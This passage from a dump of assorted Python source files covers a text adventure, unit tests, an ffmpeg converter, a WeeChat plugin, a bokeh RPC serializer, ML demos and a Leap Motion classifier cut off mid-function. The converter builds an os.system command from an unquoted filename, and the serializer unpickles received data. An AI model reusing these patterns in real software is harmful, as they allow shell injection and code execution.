print(PlayerIG.current_room.solved)\n                print(\"\\nGreat Job, but you aren't elite just yet, the next puzzle awaits.\")\n\n                movement_handler(destination)\n            else:\n                print(\"Wrong, Try Again\")\n                print(action)\n                player_examine(action)\n\n### Treasure Chamber EXAMINE PUZZLE ###\n\n    if PlayerIG.current_room.name == 'Treasure Chamber' and room['outside'].solved == True and room['foyer'].solved == True and room['overlook'].solved == True and room['narrow'].solved == True:\n        if PlayerIG.current_room.solved == False:\n            print(\"You have already exhausted this zone, you won now go home.\")\n        elif room['outside'].solved == True and room['foyer'].solved == True and room['overlook'].solved == True and room['narrow'].solved == True:\n            print('# ' + PlayerIG.current_room.examination + ' #')\n            word = input('->')\n            if word == 'chicken':\n                PlayerIG.current_room.solved = False\n                # print(PlayerIG.current_room.solved)\n                print(\"\\nYou Have Won The Game, gratz.\\nYou proceed to play World of Warcraft with Leroy for 2 months straight.\\n At Least You Had Chicken.\")\n\n                \n            else:\n                print(\"Wrong, Try Again\")\n                print(action)\n                player_examine(action)\n        else:\n            print(\"\\n### More Rooms Need Examining/Solving.. Chum ###\")\n            movement_handler(destination)\n\n\n\nZONENAME = ''\nDESCRIPTION = 'description'\nEXAMINATION = 'examine'\nSOLVED = False\nUP = 'up', 'north'\nDOWN = 'down', 'south'\nLEFT = 'left', 'west'\nRIGHT = 'right', 'east'\n\nsolved_places = {'outside': False, \n                 'foyer': False, \n                 'overlook': False, \n                 'narrow': False, \n                 'treasure': False\n}\n\n\nmain()\n# Make a new player object that is currently in the 'outside' room.\n\n# Write a loop that:\n#\n# * Prints the current room name\n# * Prints the current description (the textwrap module might be useful here).\n# * Waits for user input and decides what to do.\n#\n# If the user enters a cardinal direction, attempt to move to the room there.\n# Print an error message if the movement isn't allowed.\n#\n# If the user enters \"q\", quit the game.\n","sub_path":"src/adv.py","file_name":"adv.py","file_ext":"py","file_size_in_byte":19976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"439482421","text":"import unittest\nfrom unittest.mock import patch\n\nfrom getnet.services.base import ResponseList\nfrom getnet.services.customers import Service, Customer\nfrom tests.getnet.services.customers.test_customer import sample\n\n\n@patch(\"getnet.Client\")\nclass ServiceTest(unittest.TestCase):\n    def setUp(self) -> None:\n        data = sample.copy()\n        data[\"status\"] = \"active\"\n        self.sample = data\n\n    def testCreate(self, client_mock):\n        client_mock.post.return_value = self.sample\n\n        service = Service(client_mock)\n        customer = service.create(Customer(**sample))\n\n        self.assertIsInstance(customer, Customer)\n        self.assertEqual(sample.get(\"customer_id\"), customer.customer_id)\n\n    def testAll(self, client_mock):\n        client_mock.get.return_value = {\n            \"customers\": [self.sample, self.sample, self.sample],\n            \"page\": 1,\n            \"limit\": 100,\n            \"total\": 3,\n        }\n\n        service = Service(client_mock)\n        customers = service.all()\n\n        self.assertIsInstance(customers, ResponseList)\n        self.assertEqual(1, customers.page)\n        self.assertEqual(3, customers.total)\n        self.assertEqual(sample.get(\"customer_id\"), customers[0].customer_id)\n\n    def testGet(self, client_mock):\n        client_mock.get.return_value = self.sample\n\n        service = Service(client_mock)\n        customer = service.get(sample.get(\"customer_id\"))\n\n        self.assertIsInstance(customer, Customer)\n        self.assertEqual(sample.get(\"customer_id\"), customer.customer_id)\n        client_mock.get.assert_called_once_with(\n            \"/v1/customers/{}\".format(sample.get(\"customer_id\"))\n        )\n\n\nif __name__ == \"__main__\":\n    unittest.main()\n","sub_path":"tests/getnet/services/customers/test_service.py","file_name":"test_service.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"65502848","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n# Copyright 2020 by Murray Altheim. All rights reserved. This file is part of\n# the Robot Operating System project and is released under the \"Apache Licence, \n# Version 2.0\". Please see the LICENSE file included as part of this package.\n#\n# author:   Murray Altheim\n# created:  2020-08-19\n# modified: 2020-08-19\n# \n# A simple script that converts an h264 to mp4 video file using ffmpeg, which\n# must already be installed.\n#\n\nimport os, sys\nfrom colorama import init, Fore, Style\ninit()\n\nif len(sys.argv) != 2:\n    print(Fore.RED + 'ERROR: expected 1 command line argument: path to h264 source file.' + Style.RESET_ALL)\n    sys.exit(1)\n    \n#print('number of arguments: {:d} arguments.'.format(len(sys.argv)))\n#print('argument List: {}'.format(str(sys.argv)))\n\nh264_filename = sys.argv[1]\nif not os.path.isfile(h264_filename):\n    print(Fore.RED + 'ERROR: source file {} does not exist.'.format(h264_filename) + Style.RESET_ALL)\n    sys.exit(1)\nprint(Fore.CYAN + Style.DIM + '-- source file: {}'.format(h264_filename) + Style.RESET_ALL)\n\nbasename, ext = os.path.splitext(h264_filename)\nmp4_filename = basename + '.mp4'\n\nif os.path.isfile(mp4_filename):\n    print(Fore.RED + 'ERROR: target file {} already exists.'.format(mp4_filename) + Style.RESET_ALL)\n    sys.exit(1)\nprint(Fore.CYAN + Style.DIM + '-- target file: {}'.format(mp4_filename) + Style.RESET_ALL)\n\nprint(Fore.GREEN + Style.BRIGHT + '-- converting {}...'.format(h264_filename) + Style.RESET_ALL)\n#ffmpeg -loglevel panic -hide_banner -r 24 -i $h264_filename -vcodec copy $mp4_filename \nos.system('ffmpeg -loglevel info -hide_banner -r 24 -i ' + h264_filename + ' -vcodec copy ' + mp4_filename )\n\nprint(Fore.CYAN + '-- complete: wrote to target file: {}'.format(mp4_filename) + Style.RESET_ALL)\n\n#EOF\n","sub_path":"h264_to_mp4.py","file_name":"h264_to_mp4.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"302710399","text":"from nonebot import on_command, CommandSession\nfrom nonebot import on_natural_language, NLPSession, IntentCommand\nfrom jieba import posseg\n\nfrom .data_source import get_weather_of_city\n\n__plugin_name__ = '天气'\n__plugin_usage__ = r\"\"\"\n天气查询\n天气 [城市名称]\n\"\"\"\n\n\n@on_command('weather', aliases=('天气', '天气预报', '查天气'))\nasync def weather(session: CommandSession):\n    city = session.current_arg_text.strip()\n    if not city:\n        city = (await session.aget(prompt='你想查询哪个城市的天气呢?')).strip()\n        while not city:\n            city = (await session.aget(prompt='要查询的城市名称不能为空呢,请重新输入')).strip()\n    weather_report = await get_weather_of_city(city)\n    await session.send(weather_report)\n\n\n# on_natural_language 装饰器将函数声明为一个自然语言处理器\n# keywords 表示需要响应的关键词,类型为任意可迭代对象,元素类型为 str\n# 如果不传入 keywords,则响应所有没有被当作命令处理的消息\n@on_natural_language(keywords={'天气'})\nasync def _(session: NLPSession):\n    # 去掉消息首尾的空白符\n    stripped_msg = session.msg_text.strip()\n    # 对消息进行分词和词性标注\n    words = posseg.lcut(stripped_msg)\n\n    city = None\n    # 遍历 posseg.lcut 返回的列表\n    for word in words:\n        # 每个元素是一个 pair 对象,包含 word 和 flag 两个属性,分别表示词和词性\n        if word.flag == 'ns':\n            # ns 词性表示地名\n            city = word.word\n            break\n\n    # 返回意图命令,前两个参数必填,分别表示置信度和意图命令名\n    return IntentCommand(90.0, 'weather', current_arg=city or '')\n","sub_path":"docs/guide/code/awesome-bot-7/awesome/plugins/weather/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"178365389","text":"import json\nimport logging\nimport time\nimport datetime as dt\n\nimport numpy as np\nfrom six.moves import cPickle as pickle\n\ntry:\n    import pandas as pd\n    is_pandas = True\nexcept ImportError as e:\n    is_pandas = False\n\nlog = logging.getLogger(__name__)\n\n\"\"\"\nserialization functions for rpc server, we serialize json messages,\nas well as python data, which are lists of numpy arrays.\nmsg serialization one object -> one string\ndata serialization list of arrays -> list of buffers/strings\n\nwe have 3 protocol levels here\n1. zeromq, functions exist to separate the envelope from the payload, and\npack those up as well.\n\n2. arrayserver protocol, arrayserver messages are the payloads of zeromq messages,\nand are packaged into clientid, reqid, msgobj (json), dataobjects -\nlist data which can be serialized and deserialized\n\n3. rpc protocol, a layer around the msgobject and a data object\n\"\"\"\nmillifactor = 10 ** 6.\n\n\nclass NumpyJSONEncoder(json.JSONEncoder):\n    def default(self, obj):\n        if is_pandas:\n            if isinstance(obj, pd.Series):\n                return self.transform_list(obj.tolist())\n            elif isinstance(obj, pd.tslib.Timestamp):\n                return obj.value / millifactor\n        if isinstance(obj, np.ndarray):\n            if obj.dtype.kind == 'M':\n                obj = obj.astype('datetime64[ms]').astype('int64')\n            return self.transform_list(obj.tolist())\n        elif isinstance(obj, np.number):\n            if isinstance(obj, np.integer):\n                return int(obj)\n            else:\n                return float(obj)\n        elif isinstance(obj, (dt.datetime, dt.date)):\n            return time.mktime(obj.timetuple()) * 1000.\n        else:\n            return super(NumpyJSONEncoder, self).default(obj)\n\n    def transform_list(self, l):\n        try:\n            for k, v in enumerate(l):\n                if isinstance(v, list):\n                    v = self.transform_list(v)\n                elif np.isnan(v):\n                    l[k] = \"NaN\"\n                elif np.isposinf(v):\n                    l[k] = \"Infinity\"\n                elif np.isneginf(v):\n                    l[k] = \"-Infinity\"\n        # If we get a type error, then there are non-numeric types\n        # in the list, just bail...\n        except TypeError:\n            pass\n        return l\n\n\ndef serialize_json(obj, encoder=NumpyJSONEncoder, **kwargs):\n    return json.dumps(obj, cls=encoder, **kwargs)\n\ndeserialize_json = json.loads\n\n\ndef default_serialize_data(data):\n    \"\"\"\n    Parmeters\n    ---------\n    data : list of python objects (mostly numpy arrays)\n\n    Returns\n    ---------\n    output : list of length 2n, where n is the number of objects.\n        first item is pickled metadata, second is the data itself.\n        for numpy arrays\n        metadata : {'datatype' : 'numpy', 'dtype' : 'dtype', 'shape' : [2,2]}\n        data : the array itself\n        for arbitrary python objects\n        metadata : {'datatype' : 'pickle'}\n        data : pickled object\n    \"\"\"\n    output = []\n\n    def add_numpy(d):\n        metadata = {'dtype': d.dtype,\n                    'shape': d.shape,\n                    'datatype': 'numpy'}\n        metadata = pickle.dumps(metadata)\n        output.append(metadata)\n        output.append(d)\n\n    def add_pickle(d):\n        output.append(pickle.dumps({'datatype': 'pickle'}))\n        output.append(pickle.dumps(d, protocol=-1))\n\n    for d in data:\n        if isinstance(d, np.ndarray):\n            d = np.ascontiguousarray(d)\n            try:\n                temp = np.frombuffer(d, dtype=d.dtype)\n            except (ValueError, TypeError):\n                add_pickle(d)\n                continue\n            add_numpy(d)\n        else:\n            add_pickle(d)\n\n    return output\n\n\ndef default_deserialize_data(input):\n    \"\"\"\n    Parmeters\n    ---------\n    input : list of strings from default_serialize_data\n\n    Returns\n    ---------\n    output : list of python objects, mostly numpy arrays\n    \"\"\"\n    output = []\n    curr_index = 0\n    while curr_index < len(input):\n        meta = pickle.loads(input[curr_index])\n        if meta['datatype'] == 'numpy':\n            array = np.frombuffer(input[curr_index + 1],\n                                  dtype=meta['dtype'])\n            array = array.reshape(meta['shape'])\n            output.append(array)\n        elif meta['datatype'] == 'pickle':\n            obj = pickle.loads(input[curr_index + 1])\n            output.append(obj)\n        curr_index += 2\n    return output\n\nserialize_web = serialize_json\n\ndeserialize_web = deserialize_json\n\n\ndef status_obj(status):\n    return {'msgtype': 'status',\n            'status': status}\n\n\ndef error_obj(error_msg):\n    return {\n        'msgtype': 'error',\n        'error_msg': error_msg}\n","sub_path":"bokeh/protocol.py","file_name":"protocol.py","file_ext":"py","file_size_in_byte":4749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"520637093","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import svm\n\n\nclass SVM:\n    def __init__(self, p):\n        self.p = p\n\n        if self.p == 2:\n            self.data = np.genfromtxt('data/binclassv2.txt',delimiter=',')\n        else:\n            self.data = np.genfromtxt('data/binclass.txt',delimiter=',')\n\n    def plotDataPoints(self, x, y, posSample, negSample):\n        plt.plot(x[posSample,0], x[posSample,1], 'r*')\n        plt.plot(x[negSample,0], x[negSample,1], 'b*')\n\n    def plotDecisionBoundary(self, clf, y, x):\n        X, Y = np.meshgrid(x, y) \n        Z = clf.predict(np.c_[X.ravel(), Y.ravel()])\n        Z = Z.reshape(X.shape)\n        plt.contour(X, Y, Z)\n\n    def main(self):\n        x = self.data[:,:self.data.shape[1]-1]\n        y = self.data[:,self.data.shape[1]-1]\n        posSample = y>0\n        negSample = y<0\n        x2 = np.arange(np.min(x[:,1]),np.max(x[:,1]),0.05)\n        x1 = np.arange(np.min(x[:,0]),np.max(x[:,0]),0.05)\n\n        clf = svm.SVC(kernel='linear', C=1)\n        clf.fit(x, y)\n\n        plt.xlabel('x1')\n        plt.ylabel('x2')\n        plt.title('SVM Part: ' + str(self.p))\n        self.plotDataPoints(x, y, posSample, negSample)\n        self.plotDecisionBoundary(clf, x2, x1)\n        plt.savefig(\"output/svm_part_\"+str(self.p))\n        plt.close()\n\n    \nmodel = SVM(2)\nmodel.main()\nmodel = SVM(1)\nmodel.main()\n","sub_path":"src/svm.py","file_name":"svm.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"536326702","text":"import tensorflow as tf \r\n# tf.placeholder define the shape of the inputs\r\na = tf.placeholder('float') #Creates a symbolic variable a \r\nb = tf.placeholder('float') #Creates a symbolic variable b\r\n\r\ny =tf.mul(a,b) #multiply the symbollic variables \r\n\r\nwith tf.Session() as sess: #creates a session to evalute the symbolic expressions\r\n\t\r\n\tprint(\"%f should equal to 2.0\" % sess.run(y,feed_dict={a:1,b:2})) #we define the values of a and b in the feed_dict it can have any number of values\r\n\tprint(\"%f should be equal to 100\" % sess.run(y,feed_dict={a:10,b:10}))\r\n\r\n","sub_path":"tfmultiply.py","file_name":"tfmultiply.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"502552358","text":"from project.code import general_functions as fun\nfrom sklearn.manifold import TSNE, MDS\nimport numpy as np\n\nimport project.code.quality_assesment.reconstruction_error as er\n\n\nclass Reduction:\n\n    def __init__(self, method, seed=2, labels=None, plot=True):\n        self.path_to_file = 'project/resources/'\n        self.path_to_results = 'project/results/'\n        self.currentFile = 'DM - D_PP - p_min 3 - delta 0.5 - q1 -5 - q2 -0.5.csv'\n        self.custom_labels = False\n        self.labels = labels\n        self.seed = seed\n        self.method = method\n        self.plot = plot\n\n    def run(self):\n        mat, labels = fun.readMatrix(self.path_to_file + self.currentFile)\n        if self.custom_labels:\n            labels = self.labels\n        mat = np.array(mat, dtype=np.float64)\n        seed = np.random.RandomState(seed=self.seed)\n        # MAGIA\n        if self.method == 'sne':\n            X = TSNE(n_components=2, random_state=seed, metric='precomputed').fit_transform(mat)\n        elif self.method == 'mds':\n            embedding = MDS(n_components=2, metric=False, max_iter=3000, eps=1e-12,\n                            dissimilarity=\"precomputed\", random_state=seed, n_jobs=1,\n                            n_init=1)\n\n            X = embedding.fit_transform(mat)\n\n        if self.plot:\n            plt = fun.plot(labels, X)\n\n        # plt.savefig(self.path_to_results + 't-sne.png')\n        print('Error: ', str(er.error(mat, X)) + '%')\n\n        return X\n","sub_path":"project/code/dimensonality_reduction/Reduction.py","file_name":"Reduction.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"563538580","text":"from PyQt5 import QtCore\nfrom PyQt5.QtWidgets import QFrame, QApplication, QMainWindow\nfrom resources.teacherUIPY.teacherInfo_frame1 import Ui_Frame\nfrom CommonHelper import CommonHelper\nimport sys\n\n\nclass teacherInfo_view(QFrame, Ui_Frame):\n\n    def __init__(self):\n        # setup UI\n        super(teacherInfo_view, self).__init__()\n        self.setupUi(self)\n\n\n# test code\nif __name__ == \"__main__\":\n    app = QApplication(sys.argv)\n\n    mainWindow = QMainWindow()\n    mainWindow.resize(1000,500)\n\n    frame1 = QFrame(mainWindow)\n    frame1.setGeometry(QtCore.QRect(400, 30, 300, 400))\n\n    test = teacherInfo_view()\n    test.setupUi(frame1)\n\n    mainWindow.show()\n    CommonHelper.readQSS(\"resources/qss/sessionFrameView.qss\",app)\n    sys.exit(app.exec_())","sub_path":"coding/GRP17-master-formal-version/teacherInfo_View.py","file_name":"teacherInfo_View.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"524256631","text":"import datetime\nfrom infinity import inf\nfrom collections import Iterable\n\nimport intervals\nimport sortedcontainers\n\nfrom . import utils\nfrom .base import Booga\n\n\nclass Domain(object):\n    \"\"\"Initialize with:\n\n    >>> Domain(1, 4)\n    >>> Domain([1, 4])\n    >>> Domain((1, 4))\n    >>> Domain([[1, 4]])\n    >>> Domain([(1, 4)])\n    >>> Domain((1, 4), (5, 8))\n    >>> Domain([1, 4], [5, 8])\n    >>> Domain([(1, 4), (5, 8)])\n    >>> Domain([[1, 4], [5, 8]])\n\n    Domain has to be closed intervals. It can be open toward -inf or\n    inf. For example, Domain(-inf, 3) means a domain from -inf to 3\n    inclusive.\n\n    \"\"\"\n    @staticmethod\n    def _is_empty(args):\n        if len(args) == 0:\n            return [(-inf, inf)]\n\n    @staticmethod\n    def _is_none(args):\n        if len(args) == 1 and args[0] is None:\n            return [(-inf, inf)]\n\n    @staticmethod\n    def _is_empty_list(args):\n        if len(args) == 1 and args[0] == []:\n            return []\n\n    @staticmethod\n    def _hashable(value):\n        try:\n            hash(value)\n        except TypeError:\n            return None\n        else:\n            return True\n\n    @staticmethod\n    def _iterable(value):\n        try:\n            iter(value)\n        except TypeError:\n            return None\n        else:\n            return True\n\n    def _valid(self, value):\n        return self._hashable(value) and not self._iterable(value)\n\n    def _is_pair(self, args):\n        try:\n            length = len(args)\n        except TypeError:\n            return None\n        else:\n            if length == 2:\n                start, end = args\n                if self._valid(start) and self._valid(end):\n                    return (start, end)\n\n    def _is_single_pair(self, args):\n        pair = self._is_pair(args)\n        if pair:\n            return [pair]\n\n    def _is_unpacked_pair_list(self, args):\n        pair_list = [self._is_pair(arg) for arg in args]\n        if all(pair_list):\n            return pair_list\n\n    def _is_pair_list(self, args):\n        if len(args) == 1 and isinstance(args[0], (list, tuple)):\n            return self._is_unpacked_pair_list(args[0])\n\n    def __init__(self, *args):\n\n        validation_function_list = [\n            self._is_empty,\n            self._is_none,\n            self._is_empty_list,\n            self._is_single_pair,\n            self._is_unpacked_pair_list,\n            self._is_pair_list,\n        ]\n        for function in validation_function_list:\n            interval_list = function(args)\n            if interval_list is not None:\n                break\n\n        if not interval_list and not self._is_empty_list(args) == []:\n            msg = (\n                'invalid arguments to Domain {}. Must be one of:\\n'\n                '  - empty or None, e.g. Domain() or Domain(None)'\n                '  - a start and end, e.g. Domain(1, 2)\\n'\n                '  - a (start, end) pair, e.g. Domain([1, 2])\\n'\n                '  - multiple (start, end) pairs, e.g.'\n                '    e.g. Domain([1, 2], [3, 4])\\n'\n                '  - a list of (start, end) pairs,'\n                '    e.g. Domain([(1, 2), (3, 4)])'\n            ).format(str(args))\n            raise ValueError(msg)\n\n        for start, end in interval_list:\n            try:\n                bad_order = (start >= end)\n            except TypeError as error:\n                raise ValueError(error)\n            else:\n                if bad_order:\n                    msg = (\n                        \"start of interval can't be greater or equal \"\n                        \"to end ({} >= {})\"\n                    ).format(start, end)\n                    raise ValueError(msg)\n\n        try:\n            sorted(interval_list)\n        except TypeError:\n            msg = \"Can't mix types\"\n            raise ValueError(msg)\n\n        ts_list = []\n        if interval_list:\n            self._start = inf\n            self._end = -inf\n            for start, end in interval_list:\n                ts = Booga()\n                ts[-inf] = False\n                ts[start] = True\n                ts[end] = False\n                ts_list.append(ts)\n                if start < self._start:\n                    self._start = start\n                if end > self._end:\n                    self._end = end\n        else:\n            self._start = -inf\n            self._end = inf\n\n        if ts_list:\n            self.ts = Booga.merge(ts_list, operation=any)\n        else:\n            self.ts = Booga()\n            self.ts[-inf] = False\n\n    def start(self):\n        return self._start\n\n    def end(self):\n        return self._end\n\n    @property\n    def lower(self):\n        return self._start\n\n    @property\n    def upper(self):\n        return self._end\n\n    def intervals(self):\n        for t0, t1, value in self.ts.iterperiods(value=True):\n            yield t0, t1\n\n    @property\n    def _interval_list(self):\n        return list(self.intervals())\n\n    def get_interval(self, value):\n\n        # value is on the boundary of an interval\n        if value in self.ts:\n            is_left_value = self.ts[value]\n            if is_left_value:\n                left_index = self.ts._d.index(value)\n                right_index = left_index + 1\n            else:\n                right_index = self.ts._d.index(value)\n                left_index = right_index - 1\n            return self.ts._d.iloc[left_index], self.ts._d.iloc[right_index]\n\n        # value is inside of an interval\n        elif self.ts[value]:\n            right_index = self.ts._d.bisect_right(value)\n            left_index = right_index - 1\n            return self.ts._d.iloc[left_index], self.ts._d.iloc[right_index]\n\n        # value is not in an interval\n        else:\n            raise KeyError(value)\n\n    def n_intervals(self):\n        return len(list(self.intervals()))\n\n    def __contains__(self, value):\n        if value in self.ts:\n            return True\n        else:\n            return self.ts[value]\n\n    def __repr__(self):\n        output = '\\n'.join('{}'.format(i) for i in self.intervals())\n        return '\\n{}\\n'.format(output)\n\n    def union(self, *others):\n        \"\"\"Union of a list of Domains. Return the Domain that is the union of\n        all Domains.\n\n        \"\"\"\n        ts_list = [self.ts]\n        ts_list.extend([d.ts for d in others])\n        on = Booga.merge(ts_list, operation=any)\n        return Domain([(t0, t1) for (t0, t1, v) in on.iterperiods(value=True)])\n\n    def intersection(self, *others):\n        \"\"\"Union of a list of Domains. Return the Domain that is the union of\n        all Domains.\n\n        \"\"\"\n        ts_list = [self.ts]\n        ts_list.extend([d.ts for d in others])\n        on = Booga.merge(ts_list, operation=all)\n        return Domain([(t0, t1) for (t0, t1, v) in on.iterperiods(value=True)])\n\n    def slice(self, start, end):\n        \"\"\"Return a segment of Domain within start and end\"\"\"\n\n        if end <= start:\n            message = (\n                \"Can't slice a Domain when end <= start. \"\n                \"Received start={} and end={}.\"\n            ).format(start, end)\n            raise ValueError(message)\n\n        if start > self.end():\n            msg = \"Start time is larger than the end of the Domain.\"\n            raise ValueError(msg)\n\n        if end < self.start():\n            msg = \"End time is smaller than the start of the Domain.\"\n            raise ValueError(msg)\n\n        intervals = []\n        for t0, t1, value in self.ts.iterperiods(\n            start=start,\n            end=end,\n            value=True,\n        ):\n            intervals.append((t0, t1))\n\n        return Domain(intervals)\n\n    def __eq__(self, other):\n        return list(self.intervals()) == list(other.intervals())\n\n    def __ne__(self, other):\n        return not(self == other)\n\n    def __or__(self, other):\n        \"\"\"Allow a | b syntax\"\"\"\n        return self.union(other)\n\n    def __and__(self, other):\n        \"\"\"Allow a & b syntax\"\"\"\n        return self.intersection(other)\n\n    def spans_between(self, start, end, unit, n_units=1):\n        previous_dt = None\n        for interval_start, interval_end in self.intervals():\n\n            # floor the start of the interval to start at something round\n            current_dt = \\\n                utils.datetime_floor(\n                    interval_start, unit=unit, n_units=n_units)\n\n            while current_dt < interval_end:\n                next_dt = current_dt + datetime.timedelta(**{unit: n_units})\n                if not previous_dt == current_dt:\n                    yield current_dt, next_dt\n                previous_dt = current_dt\n                current_dt = next_dt\n","sub_path":"traces/domain.py","file_name":"domain.py","file_ext":"py","file_size_in_byte":8606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"229617672","text":"#coding: utf-8\n\nSCRIPT_NAME = \"emotes\"\nSCRIPT_AUTHOR = \"Rain\"\nSCRIPT_VERSION = \"0.1\"\nSCRIPT_LICENSE = \"MIT\"\nSCRIPT_DESC = \"Replace keywords with emotes.\"\n\nimport_ok = True\n\ntry:\n    import weechat\nexcept ImportError:\n    print(\"This script must be run under WeeChat.\")\n    print(\"Get WeeChat now at: http://www.weechat.org/\")\n    import_ok = False\n\n\ntrigger = \"$\"\n\nemotes = {\n    \"flip\": \"(╯°□°)╯︵ ┻━┻\",\n    \"unflip\": \"┬──┬◡ノ(° -°ノ)\",\n    \"zombie\": \"(∫•…•)∫\"\n}\n\ndef my_command_mod(data, modifier, modifier_data, msg):\n    for key in emotes:\n        if trigger + key in msg:\n            msg = msg.replace(trigger + key, emotes[key])\n    return msg\n\n\nif __name__ == \"__main__\" and import_ok:\n    if weechat.register(SCRIPT_NAME, SCRIPT_AUTHOR, SCRIPT_VERSION,\n                        SCRIPT_LICENSE, SCRIPT_DESC, \"\", \"\"):\n        weechat.hook_modifier(\"irc_out1_privmsg\", \"my_command_mod\", \"\")\n\n","sub_path":"emotes.py","file_name":"emotes.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"483721756","text":"import time\nfrom string import lower, upper\n\nfrom controller import LeapIO as io\nfrom controller.LeapDataTrainer import NN_Trainer, SVM_Trainer, DT_Trainer\nimport controller.LeapFeatureExtractor as extractor\n\n# Import view libraries\nimport view.prompt.Prompter as prompter\n\n\nclass LeapDataClassifier:\n    def __init__(self, acquisitor):\n        self.acquisitor = acquisitor\n\n    def do_classification_from_csv(self, pickle_file, train_subject, test_subject, classifier_type, gesture_set,\n                                   feature_set, unseen_data, file_name):\n        # Obtain data content of the unseen data file\n        X_data_set, y_data_set = io.acquire_data_from_csv(csv_file=unseen_data)\n        trainer = None\n\n        # Obtain classifier type\n        trainer = self.obtain_classifier(classifier_type=classifier_type, gesture_set=gesture_set,\n                                         feature_set=feature_set, train_subject=train_subject, pickle_file=pickle_file)\n\n        # Create time and classification lists\n        time_list = []\n        i = 0\n        correct_predictions = 0\n        # Do classification for each data set\n        print(\"\"),\n        for X_data in X_data_set:\n            y_data = y_data_set[i]\n\n            # Classify gestures and return results\n            prediction, result, time_taken = self.classify_known_gesture(\n                feature_data_set=X_data,\n                feature_type=feature_set,\n                chosen_gesture=y_data,\n                trainer=trainer,\n                verbose=False\n            )\n\n            time_list.append(time_taken)\n            # Check if correct\n            if result is True:\n                correct_predictions += 1\n\n            # Check if personalized\n            if lower(train_subject) == lower(test_subject):\n                personalized = \"personalized\"\n            else:\n                personalized = \"non-personalized\"\n\n            print(\"\\rProgress - - - > \" + str(i) + \"/\" + str(len(X_data_set))),\n            # Print regardless of verbosity\n            # print(upper(personalized) + \" : \" + upper(classifier_type) +\n            #       \"(\" + str(trainer.training_acc) + \"%) -- Train Subject :\" + test_subject +\n            #       \", Test Subject : \" + test_subject + \" >> \" + gesture_set + \" - \" + feature_set + \" = \" + prediction)\n\n            # Append to csv results\n            io.append_classification_csv_results(personalized=personalized, classifier_type=classifier_type,\n                                                 training_score=trainer.training_acc, train_subject=test_subject,\n                                                 test_subject=train_subject, gesture_set=gesture_set,\n                                                 feature_set=feature_set, correct=result, time=time_taken,\n                                                 gesture=y_data, prediction=prediction)\n            i += 1\n\n        # Process corresponding results\n        self.process_modified_test_results(\n            classifier_type=classifier_type,\n            test_subject=train_subject,\n            correct_classification=correct_predictions,\n            time_list=time_list,\n            gesture_set=gesture_set,\n            feature_set=feature_set,\n            file_name=file_name,\n            comparison_subject=test_subject,\n            file_path=pickle_file,\n            unseen_data=unseen_data,\n            trainer=trainer,\n            verbose=False\n        )\n\n        accuracy = round(float(correct_predictions)/float(len(X_data_set)), 5)\n        return accuracy\n\n    def do_classification_from_features(self, trainer, feature_data_set):\n        # Obtain values\n        value_set = []\n        for feature_data in feature_data_set:\n            value_set.append(feature_data.value)\n\n        prediction = self.classify_unknown_gesture(feature_data_set=value_set, trainer=trainer)\n\n        return prediction[0]\n\n\n    def do_classification_from_hand(self, pickle_file, train_subject, classifier_type, gesture_set,\n                                    feature_set, chosen_gesture, hand):\n        # Initialize variables\n        feature_data_set = None\n\n        # Obtain classifier type\n        trainer = self.obtain_classifier(classifier_type=classifier_type, gesture_set=gesture_set,\n                                         feature_set=feature_set, train_subject=train_subject, pickle_file=pickle_file)\n        # Acquire X data set\n        if feature_set == 'finger-angle-and-palm-distance':\n            feature_name, feature_data_set = extractor.extract_finger_palm_angle_distance(hand=hand)\n            pass\n        elif feature_set == 'finger-angle-using-bones':\n            feature_name, feature_data_set = extractor.extract_finger_palm_angle(hand=hand)\n            pass\n        elif feature_set == 'finger-between-distance':\n            feature_name, feature_data_set = extractor.extract_finger_finger_distance(hand=hand)\n            pass\n        elif feature_set == 'finger-to-palm-distance':\n            feature_name, feature_data_set = extractor.extract_finger_palm_distance(hand=hand)\n            pass\n\n        # Obtain just the values\n        value_set = []\n        for feature_data in feature_data_set:\n            value_set.append(feature_data.value)\n\n        prediction, result, _ = self.classify_known_gesture(\n            trainer=trainer,\n            feature_type=feature_set,\n            feature_data_set=value_set,\n            chosen_gesture=chosen_gesture,\n            verbose=False\n        )\n\n        return prediction, result, trainer\n\n    def classify_unknown_gesture(self, feature_data_set, trainer):\n        prediction = trainer.classify([feature_data_set])\n        return prediction\n\n\n    def classify_known_gesture(self, feature_data_set, chosen_gesture, trainer, feature_type=None, verbose=True):\n        # Recording timing of classification\n        start_time = round(time.time(), 8)\n        prediction = trainer.classify([feature_data_set])\n        end_time = round(time.time(), 8)\n\n        time_taken = round(end_time - start_time, 8)\n\n        # Output for user\n        if (prediction[0]) == chosen_gesture:\n            if verbose is True:\n                print(\"- - - - - CORRECT PREDICTION - - - - -\")\n            result = True\n        else:\n            if verbose is True:\n                print(\"+ + + + + INCORRECT PREDICTION + + + + +\")\n            result = False\n\n        if verbose is True and feature_type is not None:\n            print(\"Feature Used  : \" + feature_type)\n            print(\"Prediction    : \" + lower(prediction[0]))\n            print(\"Time Taken    : \" + str(time_taken) + \"\\n\")\n\n        return prediction[0], result, 